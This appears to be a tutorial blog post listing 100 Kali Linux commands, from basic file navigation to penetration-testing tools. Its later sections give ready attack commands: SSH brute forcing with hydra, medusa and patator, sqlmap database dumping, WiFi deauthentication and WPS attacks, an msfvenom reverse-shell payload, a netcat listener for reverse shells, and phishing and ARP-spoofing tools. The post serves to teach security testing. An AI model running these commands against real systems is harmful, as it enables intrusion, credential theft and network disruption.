Kali Linux is the most widely used operating system for ethical hacking and penetration testing. It is a specialized Linux distribution designed for cybersecurity professionals, penetration testers, and security researchers who need powerful tools to identify vulnerabilities in networks, applications, and systems.
The platform comes preinstalled with hundreds of cybersecurity tools used for activities such as vulnerability assessment, digital forensics, wireless security testing, and web application penetration testing. However, before using advanced tools like Nmap, Metasploit, SQLMap, and Burp Suite, every cybersecurity learner must first understand the Kali Linux commands that operate inside the Linux terminal.
Most penetration testing tasks are performed through the command line. Learning Kali Linux commands allows ethical hackers to control the operating system efficiently, execute security tools, automate workflows, and analyze target systems during security assessments.
By mastering essential Kali Linux commands, cybersecurity professionals can:
- navigate the Linux filesystem
- manage files and directories
- analyze network connections
- perform reconnaissance and vulnerability testing
- run penetration testing tools efficiently
- automate security operations
Whether you are a beginner starting your cybersecurity journey or an experienced professional looking to improve your command-line skills, understanding Kali Linux commands is a critical step toward becoming an effective ethical hacker.
In this comprehensive guide, you will learn 100 essential Kali Linux commands used by ethical hackers and penetration testers to navigate systems, analyze networks, perform reconnaissance, and execute penetration testing tasks in real-world cybersecurity environments.
Table of Contents
1. pwd — Print Working Directory
The pwd command shows the current directory path you are working in.
Syntax
pwd
Example
pwd
Output:
/home/kali/Desktop
Why Hackers Use It
During penetration testing, you often navigate through many directories containing scripts, exploits, and scan results. pwd helps confirm your current location.
2. ls — List Files and Directories
The ls command lists all files and directories inside the current folder.
Syntax
ls
Example
ls
Output:
exploits
wordlists
scans
scripts
Useful Options
ls -l
Shows detailed file information.
ls -a
Shows hidden files.
Hacker Use Case
Hackers use ls to quickly locate tools, payloads, scripts, or downloaded exploit files.
3. ls -la — List All Files (Including Hidden Files)
Linux systems contain hidden files that begin with a dot (.).
These files usually store configuration settings.
Syntax
ls -la
Example Output
drwxr-xr-x kali kali 4096 scripts
-rw-r--r-- kali kali 512 .bashrc
-rw-r--r-- kali kali 1024 config.txt
Hacker Use Case
Hidden files may contain:
- credentials
- configuration data
- system settings
These files are important during privilege escalation investigations.
4. cd — Change Directory
The cd command allows you to move between directories.
Syntax
cd directory_name
Example
cd exploits
Now your working directory becomes:
/home/kali/exploits
Navigate to Specific Path
cd /usr/share/wordlists
Hacker Use Case
Many security tools store wordlists and scripts in different directories. cd helps navigate them quickly.
5. cd .. — Move to Parent Directory
This command moves one level up in the directory structure.
Syntax
cd ..
Example
Current directory:
/home/kali/exploits
Command:
cd ..
New directory:
/home/kali
Hacker Use Case
Useful when navigating deep directory trees during reconnaissance.
6. clear — Clear the Terminal Screen
The clear command removes all previous terminal output.
Syntax
clear
Shortcut
Ctrl + L
Hacker Use Case
When running many scans or commands, the terminal becomes cluttered. Clearing it helps maintain a clean workspace.
7. history — Show Command History
The history command displays previously executed commands.
Syntax
history
Example Output
101 nmap 192.168.1.1
102 hydra ssh
103 ls
104 nano script.sh
Hacker Use Case
Useful for:
- repeating previous commands
- reviewing executed penetration testing steps
- auditing terminal activity
8. man — Manual Pages for Commands
The man command opens the manual documentation for Linux commands.
Syntax
man command_name
Example
man nmap
Information Provided
Manual pages include:
- command description
- options and flags
- usage examples
Hacker Use Case
When learning a new tool or command, man helps understand its functionality quickly.
9. whoami — Show Current Logged-In User
The whoami command displays the username of the current user.
Syntax
whoami
Example Output
kali
Hacker Use Case
During privilege escalation testing, hackers verify whether they have gained root access.
Example:
root
10. exit — Close Terminal Session
The exit command closes the current terminal session.
Syntax
exit
Hacker Use Case
Used when finishing work on:
- SSH sessions
- remote systems
- terminal environments
File Management Commands (11–20)
Penetration testers frequently manage:
- exploit scripts
- scan results
- payload files
- password wordlists
These commands help organize and manipulate files efficiently.
11. touch — Create an Empty File
The touch command creates a new empty file.
Syntax
touch filename
Example
touch notes.txt
Hacker Use Case
Hackers often create files to:
- store scan results
- write scripts
- save notes during testing
12. mkdir — Create Directory
Creates a new folder.
Syntax
mkdir foldername
Example
mkdir scans
Example Folder Structure
scans/
exploits/
payloads/
wordlists/
Hacker Use Case
Helps organize penetration testing files.
13. rm — Remove File
Deletes a file permanently.
Syntax
rm filename
Example
rm test.txt
Warning
Deleted files cannot be recovered easily.
Hacker Use Case
Used to remove temporary files or unwanted payloads.
14. rm -rf — Remove Directory and Contents
Deletes a folder and everything inside it.
Syntax
rm -rf foldername
Example
rm -rf scans
Important
Use cautiously. It deletes files without confirmation.
15. cp — Copy Files
Copies files from one location to another.
Syntax
cp source destination
Example
cp exploit.py backup_exploit.py
Hacker Use Case
Hackers often duplicate scripts before modifying them.
16. mv — Move or Rename Files
Moves or renames files.
Syntax
mv source destination
Rename File
mv test.txt results.txt
Move File
mv results.txt /home/kali/Desktop
17. cat — Display File Contents
Displays file contents in the terminal.
Syntax
cat filename
Example
cat passwords.txt
Hacker Use Case
Useful for quickly viewing:
- password lists
- configuration files
- scan outputs
18. nano — Text Editor
Nano is a simple terminal text editor.
Syntax
nano filename
Example
nano script.sh
Important Shortcuts
Ctrl + O → Save file
Ctrl + X → Exit editor
Hacker Use Case
Used to write:
- scripts
- exploits
- configuration files
19. head — View First Lines of File
Displays the first lines of a file.
Syntax
head filename
Example
head rockyou.txt
Shows first 10 passwords in the wordlist.
20. tail — View Last Lines of File
Displays the last lines of a file.
Syntax
tail filename
Example
tail logs.txt
Hacker Use Case
Commonly used to monitor log files in real time.
Example:
tail -f access.log
File Searching & Permission Commands (21–30)
These commands help hackers locate important files, search sensitive information, and control file permissions.
21. find — Search for Files and Directories
The find command searches the filesystem for files that match specific conditions.
Syntax
find [directory] -name filename
Example
find / -name passwords.txt
This command searches the entire system for a file named passwords.txt.
Useful Options
Search for .txt files:
find /home -name "*.txt"
Search for files modified in last 7 days:
find / -mtime -7
Hacker Use Case
During penetration testing, attackers use find to locate:
- password files
- configuration files
- backup files
- SSH keys
22. locate — Fast File Search
The locate command searches files using a prebuilt database, making it much faster than find.
Syntax
locate filename
Example
locate rockyou.txt
Output:
/usr/share/wordlists/rockyou.txt
Update Database
updatedb
Hacker Use Case
Used to quickly locate:
- password wordlists
- exploit scripts
- configuration files
23. grep — Search Text Inside Files
The grep command searches for specific text inside files.
Syntax
grep "keyword" filename
Example
grep admin users.txt
This command finds lines containing admin.
Case Insensitive Search
grep -i password users.txt
Recursive Search
grep -r password /home
Hacker Use Case
Hackers use grep to search for:
- passwords
- API keys
- credentials
- sensitive information
24. chmod — Change File Permissions
The chmod command modifies file permissions.
Linux permissions include:
read (r)
write (w)
execute (x)
Syntax
chmod permissions filename
Example
chmod 777 script.sh
Meaning:
7 = read + write + execute
Permission Breakdown
| Number | Permission |
|---|---|
| 7 | read + write + execute |
| 6 | read + write |
| 5 | read + execute |
| 4 | read |
Hacker Use Case
Used to make exploit scripts executable.
Example:
chmod +x exploit.sh
25. chown — Change File Ownership
Changes the owner of a file.
Syntax
chown user:group filename
Example
chown kali:kali file.txt
Hacker Use Case
Useful when managing files created by root or other users.
26. du — Disk Usage
Displays the size of directories and files.
Syntax
du [options]
Example
du -sh *
Output:
120M scans
20M exploits
5M scripts
Hacker Use Case
Used to identify large files such as captured network packets or logs.
27. df — Disk Space Usage
Shows available disk space.
Syntax
df -h
Example Output
Filesystem Size Used Avail
/dev/sda1 50G 20G 30G
Hacker Use Case
Ensures there is enough storage when saving:
- packet captures
- scan results
- large wordlists
28. file — Identify File Type
Determines the type of a file.
Syntax
file filename
Example
file exploit
Output:
ELF 64-bit executable
Hacker Use Case
Helps identify unknown files downloaded from exploit repositories.
29. stat — Display File Metadata
Shows detailed file information.
Syntax
stat filename
Example
stat passwords.txt
Displays:
- file size
- creation date
- modification date
- permissions
Hacker Use Case
Used in forensic investigations.
30. wc — Word Count
Counts lines, words, and characters in a file.
Syntax
wc filename
Example
wc rockyou.txt
Example output:
14344391 lines
Hacker Use Case
Useful when analyzing large password lists.
Networking Commands (31–40)
Networking commands allow penetration testers to identify hosts, test connectivity, and analyze network configurations.
31. ifconfig — View Network Interfaces
Displays network interface details.
Syntax
ifconfig
Example output:
eth0 192.168.1.5
wlan0 192.168.1.8
Shows:
- IP address
- MAC address
- interface status
Hacker Use Case
Used to determine the attacker machine IP address.
32. ip a — Show IP Address
Modern replacement for ifconfig.
Syntax
ip a
Displays all network interfaces.
Example output:
inet 192.168.1.5
33. ping — Test Connectivity
Checks if a host is reachable.
Syntax
ping target
Example
ping google.com
Output:
64 bytes from google.com
Hacker Use Case
Used to confirm if a server is alive before scanning it.
34. netstat — Show Open Ports and Connections
Displays network connections.
Syntax
netstat -tulnp
Options:
| Option | Meaning |
|---|---|
| -t | TCP |
| -u | UDP |
| -l | Listening |
| -n | Numeric |
| -p | Process |
Hacker Use Case
Used to identify open ports and services running on a system.
35. ss — Socket Statistics
A modern replacement for netstat.
Syntax
ss -tuln
Displays listening sockets.
Hacker Use Case
Quickly identifies active services.
36. traceroute — Trace Network Route
Shows the path packets take to reach a host.
Syntax
traceroute target
Example
traceroute google.com
Hacker Use Case
Used to analyze network paths and identify routers.
37. nslookup — DNS Lookup
Queries DNS records.
Syntax
nslookup domain
Example
nslookup example.com
Output:
93.184.216.34
Hacker Use Case
Used during reconnaissance to find server IP addresses.
38. dig — Advanced DNS Query
Provides detailed DNS information.
Syntax
dig domain
Example
dig example.com
Shows:
- DNS records
- authoritative servers
- response times
39. route — View Routing Table
Displays system routing configuration.
Syntax
route
Example output:
Destination Gateway Genmask
192.168.1.0 0.0.0.0 255.255.255.0
Hacker Use Case
Used to analyze network routes.
40. arp — Address Resolution Protocol Table
Shows devices connected to the local network.
Syntax
arp -a
Example output:
192.168.1.1 router
192.168.1.10 laptop
Hacker Use Case
Used to identify devices on the same network.
System Monitoring Commands (41–50)
System monitoring tools help security professionals observe system performance, processes, and hardware information.
41. top — Real-Time Process Monitoring
The top command displays real-time system processes and resource usage.
Syntax
top
Example Output
PID USER %CPU %MEM COMMAND
1523 kali 5.2 1.4 firefox
2431 root 3.1 0.5 ssh
Information Displayed
• CPU usage
• Memory usage
• Running processes
• System uptime
Hacker Use Case
During penetration testing, top helps monitor:
- running security tools
- CPU consumption during scans
- suspicious processes
42. htop — Interactive Process Viewer
htop is an improved version of top with an interactive interface.
Syntax
htop
Features
• Color-coded interface
• Scrollable process list
• Easy process termination
• CPU and memory graphs
Hacker Use Case
Used to monitor system performance while running heavy tools like:
- password cracking
- vulnerability scanners
- network scans
43. ps aux — List Running Processes
Displays detailed information about active processes.
Syntax
ps aux
Example Output
USER PID %CPU %MEM COMMAND
root 1201 0.5 0.3 sshd
kali 1433 2.1 1.2 nmap
Hacker Use Case
Used to detect:
- running services
- suspicious processes
- malware
44. kill — Terminate a Process
Stops a running process using its Process ID (PID).
Syntax
kill PID
Example
kill 1433
Force Kill
kill -9 PID
Hacker Use Case
Useful when stopping:
- frozen tools
- runaway scripts
- unwanted processes
45. uptime — Show System Running Time
Displays how long the system has been running.
Syntax
uptime
Example Output
10:32:10 up 3 hours, 2 users
Hacker Use Case
Helps determine:
- system stability
- server uptime during reconnaissance
46. free — Check Memory Usage
Shows RAM usage statistics.
Syntax
free -h
Example Output
total used free
8GB 3GB 5GB
Hacker Use Case
Important when running memory-intensive tools such as:
- password cracking
- large scans
- packet analysis
47. uname — System Information
Displays operating system and kernel details.
Syntax
uname -a
Example Output
Linux kali 6.1.0-amd64
Hacker Use Case
Helps identify:
- OS version
- kernel version
This information is useful for privilege escalation exploits.
48. lscpu — CPU Information
Shows processor architecture details.
Syntax
lscpu
Example Output
Architecture: x86_64
CPU(s): 8
Model name: Intel Core i7
Hacker Use Case
Used to determine system capability for heavy operations like:
- brute force attacks
- password cracking
49. lsusb — List USB Devices
Displays connected USB devices.
Syntax
lsusb
Example Output
Bus 002 Device 003: Wireless Adapter
Bus 001 Device 002: Keyboard
Hacker Use Case
Useful for verifying whether a wireless adapter supporting monitor mode is connected.
50. lspci — List PCI Devices
Displays internal hardware components.
Syntax
lspci
Example Output
Ethernet controller
Network controller
VGA compatible controller
Hacker Use Case
Used to identify:
- network cards
- GPU hardware
- wireless chipsets
Information Gathering Commands (51–60)
Information gathering (reconnaissance) is the first phase of ethical hacking.
Attackers collect details about:
- domains
- IP addresses
- email accounts
- server technologies
51. nmap — Network Scanner
Nmap is one of the most powerful network discovery tools.
Syntax
nmap target
Example
nmap 192.168.1.1
Advanced Scan
nmap -A target.com
Detects:
- open ports
- running services
- operating system
52. whois — Domain Information Lookup
Retrieves domain registration details.
Syntax
whois domain.com
Example
whois example.com
Displays:
- domain owner
- registrar
- registration date
Hacker Use Case
Useful during OSINT reconnaissance.
53. theHarvester — Email and Subdomain Collector
Collects emails and domain information from search engines.
Syntax
theHarvester -d domain.com -b google
Example
theHarvester -d example.com -b bing
Information Gathered
• email addresses
• subdomains
• employee names
54. dnsenum — DNS Enumeration Tool
Performs DNS reconnaissance.
Syntax
dnsenum domain.com
Example
dnsenum example.com
Discovers:
- DNS records
- subdomains
- name servers
55. amass — Subdomain Enumeration
Used for discovering subdomains.
Syntax
amass enum -d domain.com
Example
amass enum -d example.com
Output Example
dev.example.com
mail.example.com
admin.example.com
56. sublist3r — Subdomain Discovery Tool
Finds subdomains using search engines.
Syntax
sublist3r -d domain.com
Example
sublist3r -d example.com
57. whatweb — Website Technology Detection
Identifies technologies used by websites.
Syntax
whatweb website
Example
whatweb example.com
Example Output
Apache
WordPress
PHP
Hacker Use Case
Helps identify potential vulnerabilities.
58. nikto — Web Vulnerability Scanner
Scans websites for security issues.
Syntax
nikto -h website
Example
nikto -h http://example.com
Finds:
- outdated software
- dangerous files
- server misconfigurations
59. hydra — Online Password Brute Force Tool
Hydra performs login brute-force attacks against services.
Syntax
hydra -l username -P wordlist service://target
Example
hydra -l admin -P rockyou.txt ssh://192.168.1.10
Supported Protocols
• SSH
• FTP
• HTTP login
• MySQL
• RDP
60. john — Password Hash Cracker
John the Ripper cracks password hashes.
Syntax
john hash.txt
Show Cracked Passwords
john --show hash.txt
Supported Hashes
• MD5
• SHA1
• NTLM
• Linux shadow hashes
Hacker Use Case
Used during password audits and penetration tests.
Password Cracking Commands (61–70)
These tools test password strength and authentication security.
61. hashcat — Advanced Password Cracker
Hashcat is one of the fastest password cracking tools, capable of using GPU acceleration.
Syntax
hashcat -m hash_type hashfile wordlist
Example
hashcat -m 0 hashes.txt rockyou.txt
Explanation
-m→ hash type0→ MD5 hashhashes.txt→ file containing hashesrockyou.txt→ password list
Hacker Use Case
Used to crack leaked password hashes obtained during security assessments.
62. cewl — Custom Wordlist Generator
CeWL generates wordlists by crawling a website.
Syntax
cewl website_url -w wordlist.txt
Example
cewl https://example.com -w passwords.txt
What It Does
Extracts words from a website and creates a custom password list.
Hacker Use Case
Employees often use company-related words as passwords. CeWL helps create targeted password lists.
63. crunch — Wordlist Generator
Crunch generates custom password combinations.
Syntax
crunch min_length max_length
Example
crunch 6 8
Generates passwords between 6 and 8 characters long.
Custom Character Set
crunch 4 6 abc123
Hacker Use Case
Used for brute-force password attacks.
64. medusa — Parallel Brute Force Tool
Medusa is a fast login brute-force tool.
Syntax
medusa -h target_ip -u username -P wordlist -M service
Example
medusa -h 192.168.1.10 -u admin -P passwords.txt -M ssh
Hacker Use Case
Tests weak passwords on services like:
- SSH
- FTP
- Telnet
65. patator — Multi-Protocol Brute Force Tool
Patator supports brute forcing multiple services.
Syntax
patator module options
Example
patator ssh_login host=192.168.1.10 user=admin password=FILE0 0=passwords.txt
Supported Protocols
• SSH
• FTP
• HTTP
• SMTP
• MySQL
66. hash-identifier — Detect Hash Type
Identifies the algorithm used to generate a password hash.
Syntax
hash-identifier
Example
Paste the hash when prompted.
Example hash:
5f4dcc3b5aa765d61d8327deb882cf99
Output suggests possible hash types.
Hacker Use Case
Before cracking a hash, you must determine the correct hash algorithm.
67. john --show — Display Cracked Passwords
Shows passwords successfully cracked by John the Ripper.
Syntax
john --show hashfile
Example
john --show hashes.txt
Output example:
admin:password123
68. Kali Linux Wordlists Directory
Kali includes many password lists used for security testing.
Command
ls /usr/share/wordlists
Example output:
rockyou.txt.gz
dirb
fasttrack
Most Popular Wordlist
rockyou.txt
Contains 14 million leaked passwords.
69. Extract RockYou Password List
The RockYou list is compressed by default.
Command
gzip -d /usr/share/wordlists/rockyou.txt.gz
After extraction:
/usr/share/wordlists/rockyou.txt
70. Combine Multiple Wordlists
Combines multiple lists into one large list.
Syntax
cat list1.txt list2.txt > combined.txt
Example
cat rockyou.txt custom.txt > biglist.txt
Hacker Use Case
Creates larger password dictionaries for cracking attempts.
Web Hacking Commands (71–80)
Web applications are among the most common attack targets. These tools help ethical hackers test websites for vulnerabilities.
71. sqlmap — SQL Injection Automation Tool
SQLMap automates the detection and exploitation of SQL injection vulnerabilities.
Syntax
sqlmap -u URL
Example
sqlmap -u "http://example.com/page?id=1"
Dump Database
sqlmap -u URL --dump
Hacker Use Case
Extracts database information from vulnerable websites.
72. dirb — Web Directory Scanner
Dirb discovers hidden directories on a website.
Syntax
dirb target_url
Example
dirb http://example.com
Possible discoveries:
/admin
/login
/uploads
73. gobuster — Fast Directory Brute Force Tool
Gobuster is faster than Dirb and widely used.
Syntax
gobuster dir -u URL -w wordlist
Example
gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt
74. wfuzz — Web Application Fuzzer
WFuzz helps discover hidden parameters and directories.
Syntax
wfuzz -c -z file,wordlist.txt URL/FUZZ
Example
wfuzz -c -z file,wordlist.txt http://example.com/FUZZ
75. burpsuite — Web Application Testing Proxy
Burp Suite intercepts HTTP requests between browser and server.
Start Burp
burpsuite
Common Uses
• modify requests
• test authentication
• analyze session tokens
76. wpscan — WordPress Vulnerability Scanner
WPScan checks WordPress websites for vulnerabilities.
Syntax
wpscan --url website
Example
wpscan --url http://example.com
Detects:
- outdated plugins
- vulnerable themes
- weak passwords
77. ffuf — Fast Web Fuzzer
FFUF is one of the fastest fuzzing tools.
Syntax
ffuf -u URL/FUZZ -w wordlist
Example
ffuf -u http://example.com/FUZZ -w directories.txt
78. curl — HTTP Request Tool
Curl sends HTTP requests directly from the terminal.
Syntax
curl URL
Example
curl http://example.com
Hacker Use Case
Useful for testing APIs and HTTP responses.
79. wget — Download Files from Internet
Downloads files or entire websites.
Syntax
wget URL
Example
wget http://example.com/file.zip
80. httpx — HTTP Probing Tool
HTTPX checks which domains or hosts are alive.
Syntax
httpx -l domains.txt
Example
httpx -l subdomains.txt
Outputs active hosts.
Advanced Web Recon Commands (81–85)
These tools help discover hidden parameters and web vulnerabilities.
81. whatweb — Website Technology Fingerprinting
WhatWeb identifies technologies used by a website.
Syntax
whatweb target
Example
whatweb http://example.com
Example output:
Apache
WordPress
PHP
Cloudflare
Why Hackers Use It
Helps determine:
- CMS platforms
- server technologies
- frameworks
This helps identify potential vulnerabilities.
82. wafw00f — Detect Web Application Firewalls
Wafw00f detects if a website is protected by a Web Application Firewall (WAF).
Syntax
wafw00f target
Example
wafw00f example.com
Example output:
The site is behind Cloudflare WAF
Hacker Use Case
Helps attackers adjust testing techniques when a firewall is present.
83. nikto — Web Vulnerability Scanner
Nikto scans web servers for security issues.
Syntax
nikto -h target
Example
nikto -h http://example.com
Nikto Detects
- outdated software
- dangerous files
- misconfigurations
- insecure headers
84. dirsearch — Advanced Directory Scanner
Dirsearch finds hidden directories and files on websites.
Syntax
dirsearch -u URL
Example
dirsearch -u http://example.com
Possible results:
/admin
/login
/backup
/uploads
85. paramspider — Hidden Parameter Discovery
ParamSpider finds hidden parameters that may be vulnerable.
Syntax
paramspider -d domain
Example
paramspider -d example.com
Hacker Use Case
Hidden parameters often lead to vulnerabilities like:
- XSS
- SQL injection
- IDOR
Wireless Security Testing Commands (86–91)
Wireless penetration testing identifies weaknesses in WiFi networks.
86. airmon-ng — Enable Monitor Mode
Enables wireless adapter monitor mode.
Syntax
airmon-ng start wlan0
Result
Creates interface:
wlan0mon
Hacker Use Case
Monitor mode allows capturing wireless packets.
87. airodump-ng — Capture WiFi Packets
Captures wireless network traffic.
Syntax
airodump-ng wlan0mon
Displays
- network name (SSID)
- signal strength
- encryption type
- connected clients
88. aireplay-ng — Deauthentication Attack
Forces devices to disconnect from a network.
Syntax
aireplay-ng --deauth 10 -a BSSID wlan0mon
Example
aireplay-ng --deauth 10 -a 00:14:6C:7E:40:80 wlan0mon
Used in lab environments to capture handshake packets.
89. aircrack-ng — Crack WiFi Password
Cracks captured WiFi handshake files.
Syntax
aircrack-ng capture.cap
Example
aircrack-ng handshake.cap -w rockyou.txt
90. reaver — WPS PIN Attack
Targets routers with WPS enabled.
Syntax
reaver -i wlan0mon -b BSSID
Example
reaver -i wlan0mon -b 00:14:6C:7E:40:80
91. wash — Detect WPS Enabled Networks
Detects routers using WPS.
Syntax
wash -i wlan0mon
Example Output
BSSID Channel WPS Locked
00:14:6C:7E:40:80 6 No
Exploitation Framework Commands (92–95)
These tools are used during authorized penetration testing to simulate real attacks.
92. msfconsole — Metasploit Framework
Metasploit is the most popular exploitation framework.
Start Metasploit
msfconsole
Example
search exploit apache
Capabilities
- exploit vulnerabilities
- generate payloads
- maintain sessions
93. searchsploit — Exploit Database Search
Searches the local exploit database.
Syntax
searchsploit software_name
Example
searchsploit apache
Displays available exploits.
94. msfvenom — Payload Generator
Creates custom payloads.
Syntax
msfvenom -p payload options
Example
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe
Generates a payload executable.
95. setoolkit — Social Engineering Toolkit
Used to simulate social engineering attacks.
Start Tool
setoolkit
Modules Include
- phishing attacks
- credential harvesting
- fake login pages
Network Analysis & MITM Tools (96–100)
These tools analyze network traffic and simulate network attacks in lab environments.
96. nc (Netcat) — Network Utility
Netcat can create connections between machines.
Start Listener
nc -lvnp 4444
Hacker Use Case
Often used for reverse shells.
97. tcpdump — Packet Sniffer
Captures network traffic.
Syntax
tcpdump -i interface
Example
tcpdump -i eth0
98. ettercap — Man-in-the-Middle Tool
Used to intercept network traffic.
Start GUI
ettercap -G
99. bettercap — Advanced Network Attack Framework
Bettercap performs:
- ARP spoofing
- packet sniffing
- network discovery
Start Tool
bettercap
100. wireshark — Network Packet Analyzer
Wireshark analyzes captured packets.
Start Tool
wireshark
Hacker Use Case
Used to analyze:
- network protocols
- suspicious traffic
- authentication data
FAQs – Kali Linux Commands
What are Kali Linux commands used for?
Kali Linux commands are terminal instructions used by cybersecurity professionals to perform tasks such as system navigation, network scanning, vulnerability analysis, password auditing, and penetration testing. These Kali Linux commands allow ethical hackers to interact with the operating system, automate security tasks, and run advanced penetration testing tools efficiently.
Why are Kali Linux commands important for ethical hackers?
Kali Linux commands are important because most penetration testing tools operate through the Linux terminal. Ethical hackers use Kali Linux commands to analyze networks, manage files, discover vulnerabilities, and run security tools like Nmap, Metasploit, and SQLMap. Understanding these commands is essential for anyone learning ethical hacking or cybersecurity.
Do professional penetration testers use Kali Linux commands?
Yes. Professional penetration testers rely heavily on Kali Linux commands when conducting security assessments. These commands help security experts perform reconnaissance, vulnerability scanning, password testing, and network analysis during authorized penetration tests.
Can beginners learn Kali Linux commands easily?
Yes. Beginners can start learning Kali Linux commands by practicing basic terminal commands such as pwd, ls, cd, and mkdir. As learners gain experience, they can move on to advanced Kali Linux commands used for networking, reconnaissance, and security testing.
What are the most important Kali Linux commands for beginners?
Some of the most important Kali Linux commands beginners should learn include:
pwd
ls
cd
nmap
whois
grep
chmod
netstat
hydra
sqlmap
These commands help beginners understand filesystem navigation, networking, and basic penetration testing tasks.
Is Kali Linux legal to use?
Yes, Kali Linux is completely legal. However, using Kali Linux commands to attack systems without permission is illegal. Ethical hackers and penetration testers only use Kali Linux commands on systems they own or have explicit authorization to test.
How long does it take to learn Kali Linux commands?
Learning basic Kali Linux commands may take only a few days of practice. However, mastering advanced Kali Linux commands used in penetration testing, networking, and security analysis can take several months of continuous learning and hands-on experience.
What tools in Kali Linux use terminal commands?
Many cybersecurity tools rely on Kali Linux commands, including:
- Nmap for network scanning
- SQLMap for SQL injection testing
- Hydra for password cracking
- Metasploit for exploitation
- Aircrack-ng for wireless security testing
These tools are often executed using Kali Linux commands in the terminal.
Can Kali Linux commands be used for cybersecurity learning?
Yes. Practicing Kali Linux commands is one of the best ways to learn cybersecurity fundamentals. These commands help learners understand Linux systems, networking, and security testing techniques used in real-world penetration testing.
Conclusion
Mastering Kali Linux commands is one of the most important steps for anyone learning ethical hacking and cybersecurity. The Linux terminal is the core interface used by penetration testers to navigate systems, analyze networks, manage files, and execute powerful security tools.
In this guide, we explored 100 essential Kali Linux commands that cybersecurity professionals use daily. These commands help ethical hackers perform tasks such as filesystem navigation, network reconnaissance, vulnerability scanning, password auditing, web security testing, wireless security analysis, and exploitation during authorized penetration tests.
The key to mastering Kali Linux commands is consistent practice. Setting up a lab environment and experimenting with different commands will help you understand how cybersecurity tools work in real-world scenarios. Over time, these commands become second nature and significantly improve your efficiency during security assessments.
Whether you are starting your journey in ethical hacking or preparing for cybersecurity certifications, understanding Kali Linux commands will give you the technical foundation needed to explore advanced penetration testing techniques.
Continue practicing these commands regularly, explore additional cybersecurity tools, and build hands-on experience to become a skilled penetration tester in today’s rapidly evolving security landscape.
